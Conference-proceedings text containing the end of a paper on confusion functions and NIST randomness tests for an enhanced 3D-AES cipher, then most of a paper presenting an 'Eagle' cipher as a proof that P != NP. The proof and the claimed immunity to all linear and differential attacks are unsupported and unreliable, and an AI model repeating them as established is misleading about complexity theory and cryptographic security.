The aim of confusion is to make it very hard to find the key even if one has a large number of plaintext-ciphertext pairs produced with the same key. From the studies, it shows that any algorithm which consists of any confusion component could enrich the security, sensitivity, and robustness of the model. Hence, to tackle the major randomness issue on the SKA data category, the 3D-AES algorithm is proposed to be injected with other confusion functions to enhance its security level especially on the sensitivity to change in the 128-bit key. 3.2 Proposed Design of Confusion-Based Functions Two new functions which are based on the confusion method will be introduced. These confusion-based functions are adapted from previous studies which are using XOR operation as the confusion component in their algorithm design to add properties of randomness or in other word to increase level of security of the data from knownplaintext attack to find the key. The new confusion functions for plaintext and key are denoted as ConfuseP and ConfuseK respectively. The new proposed confusion functions are being added at the beginning of the encryption process. The differences between the encryption process of the initial 3D-AES and Enhanced 3D-AES can be demonstrated as in Fig. 3.
Fig. 3. Comparison between 3D-AES and enhanced 3D-AES encryption process
582
N. A. M. Yusof and S. Ariffin
3.3 ConfuseP The plaintext of 3D-AES is a cubic structure in the block size of 512 bits which can be illustrated as in Fig. 4. The 512-bit block is divided into 64 sub-block in 8-bit size. The 64 sub-block is arranged according to the position number as shown in Fig. 5.
Fig. 4. Cubic structure of 3D-AES plaintext
Fig. 5. Position number of 64 sub-block 3D-AES plaintext
The modification on the plaintext begins by performing an XOR operation between the plaintext, axyz and its position number, X . This process is named as ConfuseP function and it can be defined as, axyz ⊕ X , where, x = Slice number = {0, 1, 2, 3}, y = Row number = {0, 1, 2, 3}, z = Column number = {0, 1, 2, 3}, and X = Position number = {0, 1, ….,63, 64}. Below are some of the examples of ConfuseP function: • The plaintext at position a000 will be XOR with the position number ‘0’, a000 ⊕ 0 • The plaintext at position a033 will be XOR with the position number ‘15’, a033 ⊕ 15
Randomness Testing on Strict Key Avalanche Data Category
583
• The plaintext at position a303 will be XOR with the position number ‘51’, a303 ⊕ 51 Figure 6 shows the pseudocode for ConfuseP function. These additional lines of codes are inserted before the addRoundKey function.
Fig. 6. Pseudocode for ConfuseP function
Figure 7 illustrates the flowchart of the ConfuseP function. The output of this function, output_a will be the input of the addRoundKey function.
Fig. 7. Flowchart for ConfuseP function
584
N. A. M. Yusof and S. Ariffin
3.4 ConfuseK The key of 3D-AES is in the block size of 128 bits which can be illustrated as in Fig. 8. The 128-bit block is divided into 16 sub-block in 8-bit size. The 16 sub-block is arranged according to the position number as shown in Fig. 9.
Fig. 8. Structure of 16 sub-block 3D-AES key
Fig. 9. Position number of 16 sub-block 3D-AES key
The modification on the key begins by performing an XOR operation between the key, bxy and its position number, Y . This process is named as ConfuseK function and it can be defined as, bxy ⊕ Y , where, x = Row number = {0, 1, 2, 3}, y = Column number = {0, 1, 2, 3}, and Y = Position number = {0, 1, ….,15, 16}. Below are some of the examples of ConfuseK function: • The key at position a00 will be XOR with the position number ‘0’, a00 ⊕ 0 • The key at position a30 will be XOR with the position number ‘12’, a30 ⊕ 12 • The key at position a33 will be XOR with the position number ‘15’, a33 ⊕ 15 Figure 10 shows the pseudocode for ConfuseP function. These additional lines of codes are inserted before the key generation process, rotationKey function. Figure 11 illustrates the flowchart of the ConfuseK function. The output of this function, output_b will be the input of the rotationKey function.
Randomness Testing on Strict Key Avalanche Data Category
585
Fig. 10. Pseudocode for ConfuseK function
Fig. 11. Flowchart for ConfuseK function
3.5 ConfuseP−1 and ConfuseK−1 The component of Enhanced 3D-AES consists of encryption and decryption schemes. For encryption, ConfuseP and ConfuseK are the proposed designs that have been injected into the initial 3D-AES design. On the other hand, the inverse functions of both ConfuseP and ConfuseK, which are denoted as ConfuseP−1 and ConfuseK −1 respectively are designed to be injected in the Enhanced 3D-AES decryption scheme. Earlier in the initial 3D-AES decryption scheme, invSliceRotate and invMixColumn functions are used as the inversion functions of SliceRotate and MixColumn functions. Figure 12 illustrates the comparison between 3D-AES and the Enhanced 3D-AES decryption process flow. Both of the new proposed inversion functions are being added at the beginning of the decryption process. Similar to the proposed functions in the encryption process, both ConfuseK −1 and ConfuseP−1 also are confusion-based functions which are using XOR
586
N. A. M. Yusof and S. Ariffin
Fig. 12. Comparison between 3D-AES and enhanced 3D-AES decryption process
operations as the confusion components. As in ConfuseK, 128-bit key is also being used as the input for the ConfuseK −1 function. On the other hand, instead of using 512-bit plaintext as the input in ConfuseP, 512-bit ciphertext is used as the input of the ConfuseP−1 function.
4 Randomness Testing on Enhanced 3D-AES The effectiveness of this new method can only be confirmed by the experimental result. Hence, the randomness analysis on this Enhanced 3D-AES needs to be re-conducted as similar techniques as the randomness analysis on the initial version of the 3D-AES algorithm. To test the randomness of Enhanced 3D-AES block cipher, the same analysis technique and processes used for 3D-AES block cipher will be reused. The randomness analysis will be re-conducted using the new testing data sequences. All of the randomness analysis results from the Enhanced 3D-AES using NIST Statistical Test Suite based on seven data categories will be presented. The number of maximum rejection is pre-computed based on 0.1% significance level and 1000 samples. If the number of rejected sequences are less than the pre-computed number of maximum rejected sequences, the result is “PASS”. On the other hand, the result would be considered “FAIL”.
5 Discussion on Test Results This section will be explaining the test results on Enhanced 3D-AES based on the Plaintext Ciphertext Correlation (PCC), Strict Key Avalanche (SKA), Cipher Block
Randomness Testing on Strict Key Avalanche Data Category
587
Chaining Mode (CBCM), Strict Plaintext Avalanche (SPA), Random Plaintext Random Key (RPRK), High Density Key (HDK), and Low Density Key (LDK). Based on the test results obtained in the previous section, all testing data sequenced that have been generated by seven distinct data categories, SKA, PCC, SPA, RPRK, CBCM, HDK, and LDK are completely passing all 15 NIST statistical tests. The comparison between the test results of 3D-AES and Enhanced 3D-AES can be referred from Fig. 13.
Fig. 13. Comparison table for test results of randomness analysis on 3D-AES and enhanced 3D-AES
From the comparison table, it can be seen that the Enhanced 3D-AES produced better results compared to the initial design of 3D-AES. Previously, the SKA data category has failed almost all statistical tests in the NIST Statistical Test Suite. However, after the modification of the design, both SKA and SPA data categories have passed all 15 NIST statistical tests. These results give an indication that the output sequence of Enhanced 3D-AES is sensitive enough to the changes of the 128-bit key as well as to the changes of 512-bit plaintext. For the CBCM data category, the output sequence of 3D-AES has failed the Block Frequency test, but after the modification, it has passed this test. This result shows that the number of ones and zeros in each of the non-overlapping blocks that have been created from the sequence are appeared to have a random distribution. For the RPRK data category, the output sequence of 3D-AES has failed two statistical tests which are the Binary Matrix Rank and Longest Runs of Ones tests. But after the modification on the initial algorithm, both of them appeared to be passed. These passing result has become the proof that the longest run of ones within the tested sequence is consistent with the longest run of ones that would be expected in random, and the fixed-length substrings of the original sequence have linear dependence. Another data category that has failed a statistical test on 3D-AES is the HDK data category. The output sequence failed the Random Excursion Variant test. However, the modified version of the algorithm has made it pass the test. This positive result has
588
N. A. M. Yusof and S. Ariffin
become the indicator that the deviations from the distribution of the number of a random walk visit to a certain state are detected.
6 Conclusion and Future Research From the randomness test results based on SKA, PCC, SPA, RPRK, CBCM, HDK, and LDK data categories, it can be concluded that Enhanced 3D-AES is able to produce a random sequence of ciphertext. The randomness test of 3D-AES based on SKA, CBCM, HDK, and HDK data categories that previously failed the NIST statistical tests have now passed all tests. These positive test results indicate that the Enhanced 3D-AES is seemed to be a better version of 3D-AES. This is in terms of producing random output, where the randomness factor stands as the fundamental element in designing a new block cipher cryptographic algorithm especially an SPN-based design structure. As the current research is focusing only on the randomness tests on the Enhanced 3DAES, a more extensive security test against cryptanalysis attacks should be performed to evaluate the strength of the proposed algorithm. Some of the common security analyses that have been done towards other block cipher algorithms are the differential cryptanalysis, linear cryptanalysis, impossible differential, related-key attack, integral attack, boomerang attack, square attack, and meet-in-the-middle attack.
References 1. Ariffin, S., Mahmod, R., Jaafar, A., Ariffin, M.R.K.: Symmetric encryption algorithm inspired by randomness and non-linearity of immune systems. Int. J. Nat Comput. Res. 3(1), 56–72 (2012). https://doi.org/10.4018/jncr.2012010105 2. Ariffin, S., Hisan, N.A., Arshad, S., Bakar, S.H.: Square and boomerang attacks analysis of diffusion property of 3D-AES block cipher. In: 12th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery (ICNC-FSKD), pp. 862–867. IEEE (2016) 3. Ariffin, S., Yusof, N.A.: Randomness analysis on 3D-AES block cipher. In: 2017 13th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery (ICNC-FSKD) (2017) 4. Aljohani, M., Ahmad, I., Basheri, M., Alassafi, M.O.: Performance analysis of cryptographic pseudorandom number generators. IEEE Access 7, 39794–39805 (2019) 5. Isa, H., Z’aba, M.R.: Randomness analysis on LED block ciphers. In: Proceedings of the Fifth International Conference on Security of Information and Networks, pp. 60–68 (2012) 6. Shannon, Claude, E.: A mathematical theory of cryptography. In: IACR (1945) 7. Khan, M., Masood, F.: A novel chaotic image encryption technique based on multiple discrete dynamical maps. Multimedia Tools Appl. 78(18), 26203–26222 (2019). https://doi.org/10. 1007/s11042-019-07818-4 8. Hu, Z., Kais, S.: A quantum encryption design featuring confusion, diffusion, and mode of operation (2020) 9. Kumar, S., Kumar, M., Budhiraja, R., Das, M.K., Singh, S.: A cryptographic model for better information security. J. Inf. Secur. Appl. 43, 123–138 (2018) 10. Maryoosh, A.A., Dhaif, Z.S., Mustafa, R.A.: Image confusion and diffusion based on multichaotic system and mix-column. Bull. Electr. Eng. Inf. 10(4), 2100–2109 (2021)
A Proof of P ! = NP: New Symmetric Encryption Algorithm Against Any Linear Attacks and Differential Attacks Gao Ming(B) YingXiang Inc., TianFu New Area, Sichuan, China [email protected]
Abstract. P vs NP problem is the most important unresolved problem in the field of computational complexity. Its impact has penetrated into all aspects of algorithm design, especially in the field of cryptography. The security of cryptographic algorithms based on short keys depends on whether P is equal to NP. Cryptography algorithms used in practice are all based on short key, and the security of the short key mechanism is ultimately based on “one-way” assumption, that is, it is assumed that a one-way function exists. In fact, the existence of one-way function can directly lead to the important conclusion P ! = NP. In this paper, we originally constructed a short-key block cipher algorithm. The core feature of this algorithm is that for any block, when a plaintext-ciphertext pair is known, any key in the key space can satisfy the plaintext-ciphertext pair, that is, for each block, the plaintext-ciphertext pair and the key are independent, and the independence between blocks is also easy to construct. This feature is completely different from all existing short-key cipher algorithms. Based on the above feature, we construct a problem and theoretically prove that the problem satisfies the properties of oneway functions, thereby solving the problem of the existence of one-way functions, that is, directly proving that P ! = NP. Keywords: P vs NP · One-Way Function · Linear Attacks · Differential Attacks
1 Introduction Cryptography is one of the most important applications in the field of communication and computer science. In recent years, with the application of commerce, enterprises, banks and other departments, cryptography has been developed rapidly. Especially after Shannon put forward the mathematical analysis of security in “Communication theory of secrecy systems” [1], various design tools for cipher algorithms and corresponding attack tools have been developed one after another. Among them, the most common attack methods include linear attacks and differential attack. Linear attack was first proposed by M. Matsui [2], this is an attack method that is currently applicable to almost all block encryption algorithms. Kaliski BS [3] proposed a multi-linear attack based on the linear attack, but the multi-linear attack has many © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 589–601, 2023. https://doi.org/10.1007/978-3-031-28073-3_41
590
G. Ming
limitations. And the Biryukov A [4] and Chao, J.Y [5] and others further improved the framework of multi-linear attacks, thus making linear attacks have a larger application. The differential attack method was first proposed by Eli Biham [6]. BIHAM E [7] extended it to a more powerful attack method. TSUNOO [8] further constructed multiple attack methods. These attack methods have extremely high skill in the attack process, which is worthy of in-depth study. In this paper, we first designed a new encoding algorithm, which we named Eagle. The feature of the Eagle algorithm is that the output of the algorithm with the same input and the same parameters is completely random. Based on the Eagle encoding algorithm, we designed a new block symmetric cipher algorithm. Based on this cipher algorithm, for any block of plaintext-ciphertext pairs, for any key in the key space, a suitable encryption method can be found. That is to say, there is no specific mathematical relationship between the plaintext, key, and ciphertext in each block, showing a completely random property. It can also be understood that for any plaintext, encrypted with the same key every time, the ciphertext obtained is not uniquely determined, but completely randomly in the possible ciphertext space. And this feature makes the cipher algorithm resistant to all forms of linear attacks and differential attacks. At the end of this paper, we further construct a new cipher system. Under this cipher system, if any plaintext-ciphertext pair is known, then when an attacker wants to guess the possible correct key, he cannot do it in polynomial time. We have proved theoretically that this kind of problem satisfies the properties of one-way functions, that is, theoretically prove that one-way functions exist, so that P ! = NP.
2 Introduction to Eagle Encoding Algorithm We first introduce two common bit operations. XOR denoted as ⊕. Do left cycle shift of D by n bits which can be denoted as D+n , for example (1001101)+2 = (0110110). We select two L-bits parameters w0 and w1 , have odd number of different bits. For example 11010011 and 10100101 have 5 bits (5 is odd) different.
We set the initial state of L-bit as S0 , we choose one parameter in w0 or w1 , without loss of generality, assume that we choose w0 , then we define the following calculation S1 = w0 ⊕ S0 ⊕ S0+1 (1) From (1), we can easily know S0 ⊕ S0+1 = S1 ⊕ w0
(2)
A Proof of P ! = NP: New Symmetric Encryption Algorithm
591
If we only know S1 , we don’t know whether w0 or w1 we used in (1), we can confirm it through a simple trial-and-error. For example, we guess the parameter w1 was used in (1), we need to find a certain number Sx to Satisfy Sx ⊕ Sx+1 = S1 ⊕ w1
(3)
In fact, since w0 and w1 have odd number of different bits, such Sx does not exist. See Theorem 1 for details. [Theorem 1]. We arbitrarily choose two L-bit parameters w0 and w1which have odd number of different bits, for arbitrar S0 , we set S1 = w0 ⊕ S0 ⊕ S0+1 , then there doesn’t exists Sx satisfy Sx ⊕ Sx+1 = S1⊕ w1 . Proof: Firstly, by definition we get. S1 ⊕ w1 = w0 ⊕ S0 ⊕ S0+1 ⊕ w1 = S0 ⊕ S0+1 ⊕ (w0 ⊕ w1 ), Where w0 and w1 have odd number of different bits, so there are odd number of 1 in the bit string of w0 ⊕ w1 . Suppose there have Sx satisfy Sx ⊕ Sx+1 = S1 ⊕ w1 , then Sx ⊕ Sx+1 = S0 ⊕ S0+1 ⊕ (w0 ⊕ w1 ), by simple calculation we get (S0 ⊕ Sx ) ⊕ (S0 ⊕ Sx )+1 = w0 ⊕ w1 , we set Sy = S0 ⊕ Sx , then there are odd number of 1 in the bit string of Sy ⊕ Sy+1 , without of generality, we suppose that the bits with 1 are l1 , l2 , . . . , lu (u is odd). Compare to the first bit of Sy , the l1 + 1 bit of Sy is different from the first bit of Sy , the l2 + 1 bit of Sy is the same with the first bit of Sy , the l3 + 1 bit of Sy is different from the first bit of Sy , the l4 + 1 bit of Sy is the same with the first bit of Sy , and so on, since u is odd, the lu + 1 bit of Sy is different from the first bit of Sy , by the definition of cycle shift, we conclude that the first bit of Sy is different from the first bit of Sy , this is contradictory. So there doesn’t exists Sy satisfy Sx ⊕ Sx+1 = S1 ⊕ w1 . Let’s go back to the discussion just now, after a trial-and-error, we can accurately confirm which one (w0 or w1 ) we just used in (1). Now we suppose that there is a binary sequence M = b1 b2 . . . bL with length L. Start with S0 , read each bit of M from left to right sequentially, when the bit bi (1 ≤ i ≤ L) is +1 +1 , when the bit bi is 1, we set Si = w1 ⊕ Si−1 ⊕ Si−1 . 0, we set Si = w0 ⊕ Si−1 ⊕ Si−1 According to the above calculation, for every Si , we can find the only w0 or w1 +1 such that there exists Si−1 satisfy Si−1 ⊕ Si−1 = Si ⊕ wx . According to the properties of XOR and cyclic shift, we can easily know that there are only two Si−1 that satisfy +1 = Si ⊕ wx , and the two Si−1 that with each bit different. As long as we know Si−1 ⊕ Si−1 any bit of Si−1 , Si−1 can be uniquely determined. So we only need to save any bit of Si , by SL , we can completely restore the original state S0 and the binary sequence M . Based on the above discussion, we can construct a complete Eagle encoding and decoding algorithm. The entire algorithm consists of three processes: generating parameters, encoding, and decoding. [Parameter Generation] Firstly we choose two L-bit parameters w0 and w1 which have odd number of different bits, then we choose L-bit initial state S0 . [Encoding]
592
G. Ming
For input data M , we record M [i](1 ≤ i ≤ L) as the i-th bit of M , M [i] ∈ {0, 1}, L is the length of M , the encoding process is as follows. [E1] Execute E2 to E4 with i from 1 to L. +1 . [E2] If M [i] = 0, set Si = w0 ⊕ Si−1 ⊕ Si−1 +1 [E3] If M [i] = 1, set Si = w1 ⊕ Si−1 ⊕ Si−1 . [E4] Set the last bit of Si as the i-th bit of C, C[i] = Si [L]. [E5] Use (C, SL ) as the output. [Decoding] The output (C, SL ) of the above encoding process is used as the input of the decoding process, the decoding process is as follows. [D1] Execute D2 to D4 with i from L to 1. [D2] Do trial-and-error testing with Si ⊕ w0 or Si ⊕ w1 , find the unique wx (x = 0 or x = 1) satisfy Sx ⊕ Sx+1 = Si ⊕ wx . [D3] After D2, use x as the i-th bit ofM , M [i] = x. [D4] For the two possible Sx satisfy Sx ⊕ Sx+1 = Si ⊕ wx in D2, we set the one which the last bit is equal to C[i] as Si−1 . [D5] Use M as the output. It is not difficult to find that the above encoding process and decoding process are correct, that is (C, SL ) generated by encoding from M can be completely restored through the decoding process. In addition, the encoding process is sequential encoding in the order of M ’s bits, and the decoding process is sequential decoding in the reverse order of C’s bits. m1
m2
mL
S0 → S1 → S2 → · · · → SL S0 ← S1 ← S2 ← . . . ← SL c1
c2
cL
We also noticed the fact that in the above encoding and decoding process, all inputs and outputs do not need to appear S0 , This means that the selection of S0 will not affect the correctness of the encoding process and decoding process. The arbitrary of S0 will bring the uncertainty of the encoded output. For the convenience of the discussion in the following chapters, here we briefly analyze the effect of uncertainty of S0 on the encoded output. Given the parameters w0 and w1 that have odd number of different bits, for a certain input M of L bits, since S0 is arbitrarily selected, it is obvious that C is uncertain, but is the final state SL necessarily uncertain? In fact, the answer is no. In some cases, such as L = 2u (that is, the parameter length is the power of 2), the final state SL is determined for different choices of S0 . The final state variable SL which is the output of the encoding process is only related to the input M and has nothing to do with the choice of the initial state S0 . See Theorem 2 for details. [Theorem 2]. In Eagle encoding, given the parameters w0 and w1 that have L bits with different odd bits, for a certain L bit input M , if L = 2u is satisfied, then for any initial state S0 , after the Eagle encoding process, the final state SL is only related to the inputM , and is unrelated with the choice of the initial state S0 .
A Proof of P ! = NP: New Symmetric Encryption Algorithm
593
Proof: We represent M as binary stream x1 x2 . . . xL , which xi ∈ {0, 1}, 1 ≤ i ≤ L. We execute the Eagle encoding process to M from x1 to xL as follows. S1 = wx1 ⊕ S0 ⊕ S0+1 = f1 wx1 ⊕ S0 ⊕ S0+1 S2 = wx2 ⊕ S1 ⊕ S1+1 = f2 wx1 , wx2 ⊕ S0 ⊕ S0+2 S3 = wx3 ⊕ S2 ⊕ S2+1 = f3 wx1 , wx2 , wx3 ⊕ S0 ⊕ S0+1 ⊕ S0+2 ⊕ S0+3 S4 = wx4 ⊕ S3 ⊕ S3+1 = f4 wx1 , wx2 , wx3 , wx4 ⊕ S0 ⊕ S0+4 It is not difficult to find that for any m = 2v , Sm = fm wx1 , . . . , wxm ⊕ S0 ⊕ S0+m holds, this can be proved by a simple mathematical induction. In fact, the conclusion is correct for v = 1. We assume that the conclusion is correct for v − 1, we have +m/2 , since Sm/2 to Sm must do calculations Sm/2 = fm/2 wx1 , . . . , wxm/2 ⊕ S0 ⊕ S0 with m/2 steps, we have. +m +m Sm = fm wx1 , . . . , wxm ⊕ S0 ⊕ S0 2 ⊕ S0 2 ⊕ S0+m = fm wx1 , . . . , wxm ⊕ S0 ⊕ S0+m . Since L = 2u , we have SL = fL wx1 , . . . , wxL ⊕ S0 ⊕ S0+L , where +L fi (. . . ) is irrelevant with S0 , by definition of cycle shift, we have S0 = S0 , so SL = fL wx1 , . . . , wxL is irrelevant with S0 . From theorem 2, for any parameters w0 and w1 with length L = 2u , for any initial state S0 , execute Eagle encoding on M to obtain SL which is irrelevant with S0 . In order to facilitate the description in the following chapters, we introduce the symbol ξ and ζ . ξw0 ,w1 : (S0 , M ) ⇒ (S1 , C) use the key w0 ,w1 to execute Eagle encoding ([E1]-[E5]) on initial state S0 and input M to obtain C and S1 . ξw0 ,w1 : (S1 , C) ⇒ (S0 , M ) use the key w0 ,w1 to execute Eagle decoding ([D1]-[D5]) on C and S1 to obtain S0 and M . In all the following chapters of this paper, we assume the length is a power of 2.
3 Eagle Encryption Algorithm The core idea of Eagle encryption algorithm comes from the Eagle encoding process. If we use the parameters w0 and w1 in the Eagle encoding process as encryption keys, the process of encoding Input can be regarded as the process of encrypting plaintext Input. Output (Output, Sn ) can be used as ciphertext. In fact, we can introduce uncertainty into the initial state S0 without affecting the correctness of the decoding process. We will see later that uncertainty allows us to design a more secure encryption system. Next, we will introduce the Eagle encryption algorithm in detail. The entire Eagle encryption algorithm is divided into three processes: key generator, encryption process, and decryption process.
594
G. Ming
3.1 Eagle Key Generator First, the choice of the key is completely random, and the key needs to be shared between the encryptor and the decryptor. Since w0 and w1 must have odd number of different bits, there are only 22L−1 effective keys with bits length of 2L, one bit will be lost. That is, in the Eagle encryption algorithm, the number of bits for the key is always an odd number. We randomly generate a number with bits length of 2L. We take the first L bits as w0 . When the next L bits are different from w0 by an odd number of “bits”, then we directly take the next L bits as w1 ; when the next L bits are different from w0 by an even number of “bits”, we set the next L bits as w1 with the last bit inverted. 3.2 Eagle Encryption Process For the 2L − 1-bit key w0 and w1 , for the plaintext M , we construct Eagle encryption processes as follows: [M1] The plaintext M is grouped by L bits, and the last group with less than L bits are randomly filled into L bits. The total number of groups is assumed to be T , the grouped plaintext M is recorded as M1 , M2 , . . . MT . [M2] We randomly generate two numbers as the initial state S0 and the random group MT +1 inserted into M1 , M2 , . . . MT . [M3] Calculate from the first group to the T + 1 group. For the first group M1 , Start state is S0 , after the encoding of [E1]-[E5], the state becomes S1 , and the encoded data is C1 (Each bit of C1 is composed of the last bit of all intermediate states), which are recorded as ξw0 ,w1 : (S0 , M1 ) ⇒ (S1 , C1 ). Then we reset the state S1 to S1 = S1 ⊕C1 . For the second group M2 , the state is S1 , after the encoding of [E1]-[E5], the state becomes S2 , and the encoded data is C2 , which are recorded as ξw0 ,w1 : (S1 , M2 ) ⇒ (S2 , C2 ), then reset S2 = S2 ⊕ C2 . After T + 1 groups, the final state is ST +1 , and the encoded data of each group is C1 , C2 , . . . , CT +1 . [M4] Output C1 C2 . . . CT +1 ST +1 as ciphertext. 3.3 Eagle Decryption Process With the same key w0 and w1 , for ciphertext C1 C2 . . . CT +1 ST +1 , the Eagle decryption processes are as follows: [C1] Starting from the last group T + 1 to the first group, do decryption in sequence. For the T +1 group, we reset ST +1 = ST +1 ⊕CT +1 and use ST +1 and CT +1 to execute the decoding operations [D1]-[D5] introduced in Chapter 2 to obtain state ST and decoded dataMT +1 , which are recorded asζw0 ,w1 : (ST +1 , CT +1 ) ⇒ (ST , MT +1 ). For the T group, we reset ST = ST ⊕ CT and use states ST and CT to execute the decoding operations [D1]-[D5] to obtain state ST −1 and decoded dataMT , which are recorded as ζw0 ,w1 : (ST , CT ) ⇒ (ST −1 , MT ). After execute all the processes until the first group, the decoded data corresponding to each group is MT +1 , MT , . . . , M1 respectively. [C2] Output M1 M2 . . . MT as the plaintext. Obviously, the above decryption processes can get the correct plaintext.
A Proof of P ! = NP: New Symmetric Encryption Algorithm
595
In addition, for the plaintext with the L bit, in the encryption or decryption process, it is encoded or decoded bit by bit, and the encoding or decoding process of each bit is a certain and direct calculation process, so the encryption process and the decryption process have computational complexity O(L).
4 Linear Attack Analysis to Eagle Encryption Algorithm Linear attack is a very effective attack method against the DES algorithm proposed by M. Matsui [2] at the European Cryptographic Conference in 1993. Later, scholars quickly discovered that the linear attacks are applicable to almost all block encryption algorithms, and linear attacks have become the main attacks for block encryption algorithms. Various new attacks based on linear attacks are constantly being proposed. The core idea of linear attack is to take the nonlinear transformation in the cryptographic algorithm, such as the linear approximation of the S-box, and then extend the linear approximation to the linear approximation of the round function, and then connect these linear approximations to obtain the entire cryptographic algorithm a linear approximation, and finally a large number of known plaintext-ciphertext pairs encrypted with the same key are used to exhaustively obtain the plaintext and even the key. We have noticed that the reason why linear attacks have become an effective attack for block encryption algorithms is that when the key is known, there is a certain implicit linear relationship between the ciphertext and the plaintext. By analyzing the known plaintext-ciphertext pairs, some effective linear relations can be obtained, and some bits of the key can be guessed. In the Eagle encryption processes, for a certain group, suppose that the initial state at the beginning of the group is Si−1 , the plaintext of the group is Mi , the keys are w0 and w1 , after the [E1]-[E5], we obtain the new state Si and the encoding result Ci . Only Ci is included in the ciphertext, and Si is not included in the ciphertext, that is, Si is invisible to the decryption party and thus invisible to the attacker. At the beginning of each group, Si−1 can be regarded as completely random, this is because from the first group, S0 is completely random, after the encoding process for the first group, C1 is completely random, the state S1 ⊕ C1 of the second group is also completely random. By analogy, the initial state Si−1 at the beginning of each group is completely random, and the ciphertext Ci of the group is completely random. That is to say, for a certain key and plaintext, the ciphertext is completely random, which have no mathematical relationship between the plaintext or the key. For an attacker, under the condition that a pair of plaintext Mi and ciphertext Ci of any group is known, for any key in the key space, a corresponding encryption or decryption method can be found to meet the conditions. For example, if an attacker chooses a specific key w0 and w1 , he can choose Si−1 randomly, and then use the key pair Si−1 and Mi to execute the encoding process of [E1]-[E5] to get the state Si . According to the conclusion of [Theorem 2], the arbitrariness of the attacker’s choice of Si−1 does not affect the certainty of Si . Then he can execute the decoding process of [D1]-[D5] according to Si and Ci to get Si−1 . This means that by any key he can find a suitable Si−1 that satisfies the condition for a known plaintext Mi -ciphertext Ci pair, and the attacker cannot get any valid information from the pair, which can be denoted as.
596
G. Ming
Pr(W = (w0 , w1 )|(M = mi , C = ci )) = 1/ 22L−1 . This can also be summarized as the following theorem: [Theorem 3]. For any L bit Mi and Ci , for any 2L − 1 bit K = (w0 , w1 ), there must be unique S0 and S1 , so that ξw0 ,w1 : (S0 , M1 ) ⇒ (S1 , C1 ) holds. The independence of the plaintext-ciphertext pair with the key makes it impossible for any linear attacker to establish an effective relationship.
5 Differential Attack Analysis to Eagle Encryption Algorithm Differential attack was proposed by Biham and Shamir [6] in 1990, it is a chosenplaintext attack. Its core idea is to obtain key information by analyzing specific plaintext and ciphertext differences. The essence of a differential attack is to track the “difference” of the plaintext pair, where the “difference” is defined by the attacker according to the target, which can be an exclusive XOR operation or other target values. For example, if you choose the plaintext M and the difference δ, the other plaintext is M + δ. The attacker mainly analyzes the possible keys by analyzing the difference between the ciphertext C and C + ε. For the Eagle encryption algorithm, suppose the differential attacker chooses two specific plaintexts M1 and M2 , their difference is δ, that is M2 = M1 + δ, the corresponding ciphertexts are C1 and C2 , and the difference between the ciphertexts is ε, and That is C2 = C1 + ε. Since in the encryption processes of Eagle algorithm, C1 and C2 are completely random, it is completely uncertain whether the difference ε of the ciphertext is caused by randomness or the spread of the plaintext. Furthermore, Ew0 ,w1 (M1 ) and Ew0 ,w1 (M2 ) subject to the same probability distribution, which can be denoted as Pr(C1 = c1 , C2 = c2 |(M1 = m1 , M2 = m2 )) = 1/22L . That is to say, for any specific plaintext M1 and M2 selected by the attacker, after being encrypted with the same key, the corresponding block ciphertexts C1 and C2 are completely random, and any possible value in the ciphertext space appears with equal probability. The attacker has no way to capture the propagation characteristics of the “difference” in the plaintext.
6 One-Way Function Design 6.1 Introduction to One-Way Functions Before constructing the one-way function, we briefly introduce the properties of one-way function and the relationships with the P ! = NP problem. [Definition 1]. A function is a one-way function means that the function satisfies the following properties: a) For a given x, there exists a polynomial-time algorithm that output f (x). b) Given y, it is difficult to find an x that satisfies y = f (x), that is, there does not exists a polynomial-time algorithm that is finding the x.
A Proof of P ! = NP: New Symmetric Encryption Algorithm
597
The NP-complete problem refers to a set of problems that are verifiable in polynomial-time algorithm. For all NP-complete problems, whether there exists algorithms that are solvable in polynomial-time, this is the P vs NP problem. If P ! = NP, then for some NP problems, there is no algorithm that is solvable in polynomial-time. If P = NP, then for all NP problems, there exists algorithms that are solvable in polynomial-time. If one-way function exists, it means that there exists such an NP problem, which has no deterministic polynomial time solvable algorithm, that is, P ! = NP. This is a direct inference, which can be directly described as the following theorem, See [9] for details. [Theorem 4]. If one-way function exists, then P ! = NP. We then introduce an additional simple algorithmic problem, which we describe as the following theorem. [Theorem 5]. For two sets selected completely independently, the number of elements is l1 , l2 , then the average algorithm complexity of finding the common elements of the two sets (there may be only one common element at most) is at least c∗ min(O(l1 ), O(l2 )), where c is a certain constant. This is because the remaining unvisited elements in the two sets will be visited at least once with equal probability before no common element is found. 6.2 Construction of One-Way Functions Let us go back to the Eagle encryption algorithm mentioned in Chapter 3. Assuming that the key is K = (w0 , w1 ), with length 2L − 1 bit, the plaintext has n blocks, denoted as M = (M1 , M2 , . . . , Mn ) where each block with length L bit, and the encrypted ciphertext is n. Among them, the plaintext-ciphertext pair of the i(1 ≤ i ≤ n)-th group is Mi − Ci , and the n + 1 th group has only the ciphertext (Cn+1 , Sn+1 ) known. It is not difficult to see that since the last group has only ciphertext, any key is “right”. For the i(1 ≤ i ≤ n) group, we might take the first group without loss of generality. Given the plaintext M1 and the ciphertext C1 , from Theorem 3, any key is also “right”, so we can only “guess” the key from each group independently. The plaintext-ciphertext pair between two discontinuous groups can also be regarded as completely independent, such as the plaintext or ciphertext between the i-th group and the i + 2 th group has no relationship. For two consecutive groups, the only connection between Mi -Ci and Mi+1 -Ci+1 lies in the initial state of the i + 1-th group equal to Si ⊕ Ci . In fact, we can easily cut off the connection between the i-th group and the i + 1-th group. For example, change the initial state of the i + 1-th group to Si ⊕ Y = Si+1 , where Y is a random number that does not depend on any system variables. Then put Y into the increased group to encrypt, so that when the plaintext-ciphertext pairs of any multiple groups are known, the process of “guessing” the key is independent for any grouping, and because within each group, any key is “right”, and the only way to “guess” the key is to use trial-and-error method. Since the key is 2L − 1 bits, there are 22L−1 possible keys in the entire key space. Obviously, the computational complexity of the trial-and-error method is exponential. The above analysis is the core idea for us to construct a one-way function, and then we define the following encryption algorithm:
598
G. Ming
